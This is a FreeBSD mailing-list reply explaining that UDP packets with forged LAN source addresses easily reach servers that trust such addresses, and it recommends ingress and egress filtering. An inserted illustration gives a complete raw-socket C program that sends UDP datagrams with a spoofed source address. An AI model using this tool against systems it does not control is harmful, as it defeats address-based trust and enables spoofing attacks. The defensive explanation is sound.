From: Robert Bonomi <bonomi@mail.r-bonomi.com>
Date: Sun, 17 Oct 2010 12:18:28 -0500 (CDT)
To: freebsd-questions@freebsd.org, nlandys@gmail.com
Subject: Re: UDP packet spoofed LAN source address?
Message-ID: <201010171718.o9HHISJq003050@mail.r-bonomi.com>
List-Id: freebsd-questions (User questions)

> From: Nerius Landys
> Date: Sat, 16 Oct 2010 21:56:52 -0700
> To: FreeBSD Mailing List
> Subject: UDP packet spoofed LAN source address?
>
> This is really more of a networking question.
> I'm wondering, in a typical scenario, for example my server is in a data
> center with a typical colocation company.
>
> I am editing someone else's code, and this code handles incoming UDP
> packets. The code handles UDP packets that have a source address being from
> the LAN differently. It gives those packets special treatment. To check
> whether a source address is a LAN address, it does the typical checks for
> 10.0.0.0, 172.16.0.0, 192.168.0.0, 127.0.0.0, and it also checks every
> assigned IP address with netmask to see if the source address on the UDP
> packet came from that network.
>
> My question is - how possible (in these typical environments) is it to send
> a UDP packet from far away that claims to have a source address being a LAN
> address?

*VERY* possible. In fact, -trivially- easy.

Note: it's trivial to do with TCP packets as well. However, those are usually
less worrisome because the connection set-up 'handshake' fails.

> Will such a packet typically make it to my server, or will a
> router along the way stop it from arriving?

Almost invariably, it -will- reach your network, *unless* YOU do 'ingress
filtering' at your border to block it.

Doing such ingress filtering is a GOOD IDEA(tm). Also strongly recommended:
'egress filtering' to trap anything that tries to exit with an RFC-1918
source address, or a source address that is -not- part of the netblock
assigned to your network.

> Maybe, is there a simple 10 line C program that I can run and compile to
> check if this scenario is possible on _my_ server?

'netcat' has the capability built in.
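As an added illustration (not code from either message in the thread), the following C program shows what "trivially easy" means in practice: it builds a complete IPv4+UDP datagram with whatever source address the sender chooses, here an RFC 1918 one, and hands it to a raw socket with IP_HDRINCL. The "is this a LAN source?" check described in the question only ever sees the bytes in this header. The addresses (10.0.0.5, 192.0.2.10), ports and payload are placeholders chosen for the example.

```c
/* Added example: send a UDP datagram with a spoofed IPv4 source address.
 * Needs root (raw socket). Addresses/ports are placeholders, not from the
 * thread. Assumes Linux or FreeBSD 11+ raw-socket semantics: every header
 * field is in network byte order. (FreeBSD before 11 expected ip_len and
 * ip_off in HOST byte order with IP_HDRINCL; adjust if running there.) */
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

struct ipv4_hdr {
    uint8_t  ver_ihl;    /* 0x45: version 4, header length 5*4 = 20 bytes */
    uint8_t  tos;
    uint16_t total_len;  /* IP header + UDP header + payload */
    uint16_t id;
    uint16_t frag_off;
    uint8_t  ttl;
    uint8_t  proto;      /* IPPROTO_UDP (17) */
    uint16_t checksum;   /* ones-complement checksum of this header only */
    uint32_t src;        /* the field the receiver "trusts" */
    uint32_t dst;
} __attribute__((packed));

struct udp_hdr {
    uint16_t sport, dport, len, checksum; /* checksum 0 = none, legal on IPv4 */
} __attribute__((packed));

/* RFC 1071 ones-complement checksum, summing bytes in network order.
 * Returns the value as a host integer; store it with htons(). */
uint16_t inet_checksum(const void *data, size_t len)
{
    const uint8_t *p = data;
    uint32_t sum = 0;
    while (len > 1) { sum += (uint32_t)((p[0] << 8) | p[1]); p += 2; len -= 2; }
    if (len) sum += (uint32_t)(p[0] << 8);           /* odd trailing byte */
    while (sum >> 16) sum = (sum & 0xffff) + (sum >> 16);
    return (uint16_t)~sum;
}

/* Fill buf with IP + UDP headers and payload, claiming spoofed_src as the
 * sender. Returns the datagram length, or -1 on bad address / no room. */
int build_spoofed_udp(uint8_t *buf, size_t buflen,
                      const char *spoofed_src, const char *dst,
                      uint16_t sport, uint16_t dport,
                      const void *payload, size_t plen)
{
    size_t total = sizeof(struct ipv4_hdr) + sizeof(struct udp_hdr) + plen;
    struct in_addr s, d;
    if (total > buflen || total > 0xffff) return -1;
    if (inet_pton(AF_INET, spoofed_src, &s) != 1 ||
        inet_pton(AF_INET, dst, &d) != 1) return -1;

    struct ipv4_hdr ip;
    memset(&ip, 0, sizeof ip);
    ip.ver_ihl   = 0x45;
    ip.total_len = htons((uint16_t)total);
    ip.id        = htons(0x1234);
    ip.ttl       = 64;
    ip.proto     = IPPROTO_UDP;
    ip.src       = s.s_addr;   /* nothing on the sending host checks this */
    ip.dst       = d.s_addr;
    ip.checksum  = htons(inet_checksum(&ip, sizeof ip));

    struct udp_hdr udp;
    udp.sport    = htons(sport);
    udp.dport    = htons(dport);
    udp.len      = htons((uint16_t)(sizeof udp + plen));
    udp.checksum = 0;

    memcpy(buf, &ip, sizeof ip);
    memcpy(buf + sizeof ip, &udp, sizeof udp);
    memcpy(buf + sizeof ip + sizeof udp, payload, plen);
    return (int)total;
}

int main(int argc, char **argv)
{
    const char *src = argc > 1 ? argv[1] : "10.0.0.5";     /* placeholder */
    const char *dst = argc > 2 ? argv[2] : "192.0.2.10";   /* placeholder */
    uint16_t dport  = argc > 3 ? (uint16_t)atoi(argv[3]) : 27960;
    const char payload[] = "spoof-test";
    uint8_t pkt[512];

    int n = build_spoofed_udp(pkt, sizeof pkt, src, dst, 4000, dport,
                              payload, sizeof payload - 1);
    if (n < 0) { fprintf(stderr, "bad address or oversized packet\n"); return 1; }

    int fd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);     /* root only */
    if (fd < 0) { perror("socket"); return 1; }
    int one = 1;
    if (setsockopt(fd, IPPROTO_IP, IP_HDRINCL, &one, sizeof one) < 0) {
        perror("setsockopt(IP_HDRINCL)"); return 1;
    }
    struct sockaddr_in to;
    memset(&to, 0, sizeof to);
    to.sin_family = AF_INET;
    inet_pton(AF_INET, dst, &to.sin_addr);
    if (sendto(fd, pkt, (size_t)n, 0, (struct sockaddr *)&to, sizeof to) < 0) {
        perror("sendto"); return 1;
    }
    printf("sent %d bytes claiming to be from %s to %s:%u\n", n, src, dst, dport);
    close(fd);
    return 0;
}
```

Build with `cc -o spoofudp spoofudp.c`, run as root, and watch the target with `tcpdump -ni <if> udp port 27960`: the datagram arrives carrying 10.0.0.5 as its source, and a receiver that grants "LAN" privileges on that basis will grant them to whoever sent it. Replies, if any, go to the real 10.0.0.5, which is why this is most dangerous for one-way UDP traffic and far less so for TCP, where the handshake never completes. Only filtering in the path stops it: ingress filtering at the border (on FreeBSD, pf's `antispoof` rules, or explicit block rules for RFC 1918 sources on the external interface), and egress filtering so your own network cannot be used to launch the same thing at others.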